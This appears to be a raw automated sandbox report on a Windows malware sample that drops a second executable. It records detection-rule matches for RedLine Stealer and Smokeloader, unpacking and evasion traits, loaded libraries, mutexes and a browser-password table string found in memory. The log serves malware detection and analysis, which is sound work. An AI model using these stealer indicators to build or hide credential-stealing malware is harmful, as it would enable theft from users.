Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: String function: 024B8297 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: String function: 00408030 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: String function: 00414400 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: String function: 024C4667 appears 65 times
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: String function: 00410720 appears 52 times
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: String function: 02540987 appears 52 times
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: String function: 0040FDB2 appears 123 times
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: String function: 02540019 appears 119 times

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1800

Source: TUp6f2knn2.exe	Binary or memory string: OriginalFileName vs TUp6f2knn2.exe
Source: TUp6f2knn2.exe, 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs TUp6f2knn2.exe
Source: TUp6f2knn2.exe, 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs TUp6f2knn2.exe
Source: TUp6f2knn2.exe, 00000000.00000003.1698186875.00000000025A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs TUp6f2knn2.exe

Source: TUp6f2knn2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000001.00000002.2189547236.000000000095A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.4130558375.0000000000B4A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: TUp6f2knn2.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: B4A1.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/7@2/3

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_00B4B42E CreateToolhelp32Snapshot,Module32First,

0_2_00B4B42E

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Code function: 1_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_00437DF0

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7460
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

File created: C:\Users\user\AppData\Local\Temp\B4A1.tmp

Jump to behavior

Source: TUp6f2knn2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: B4A1.tmp.exe, 00000001.00000003.1817433357.0000000003201000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TUp6f2knn2.exe

ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\TUp6f2knn2.exe "C:\Users\user\Desktop\TUp6f2knn2.exe"
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Process created: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe "C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1800
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Process created: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe "C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Unpacked PE file: 1.2.B4A1.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Unpacked PE file: 0.2.TUp6f2knn2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Unpacked PE file: 1.2.B4A1.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0043DB77 push dword ptr [esp+ecx-75h]; iretd	0_2_0043DB7B
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00B4E025 push 00000003h; ret	0_2_00B4E029
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00B4C27A push es; iretd	0_2_00B4C28B
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00B50632 pushad ; ret	0_2_00B5064E
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00B507B0 push ecx; ret	0_2_00B507CD
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00B4DB84 pushad ; ret	0_2_00B4DBAC
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_025409CD push ecx; ret	0_2_025409E0
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0256799F push esp; retf	0_2_025679A7
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0254CE18 push ss; retf	0_2_0254CE1D
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0253FFF3 push ecx; ret	0_2_02540006
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02567F9D push esp; retf	0_2_02567F9E
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02569DE8 pushad ; retf	0_2_02569DEF
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_3_0320CD4C push es; iretd	1_3_0320CD52
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	1_2_0043D812
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00443469 push ebp; iretd	1_2_0044346C
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0044366E push 9F00CD97h; ret	1_2_004436B1
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	1_2_0043AE3E
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_004477A5 push ebp; iretd	1_2_004477AA
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_009600B2 push ss; retf	1_2_00960123
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0095BDCD push 00000039h; ret	1_2_0095BE3B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0095BDF3 push 00000039h; ret	1_2_0095BE3B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0095DD08 push ebp; ret	1_2_0095DD0B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_00960135 push ss; retf	1_2_00960123
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0095BD64 push 00000039h; ret	1_2_0095BE3B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024D3A79 push esp; iretd	1_2_024D3A7C
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024EDA77 push eax; mov dword ptr [esp], 707F7E0Dh	1_2_024EDA79
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B9B46 push edx; iretd	1_2_024B9B51
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024EB097 push eax; mov dword ptr [esp], 1D1E1F10h	1_2_024EB0A5

Source: TUp6f2knn2.exe	Static PE information: section name: .text entropy: 7.542707569113861
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.372861140072552
Source: B4A1.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.372861140072552

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	File created: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

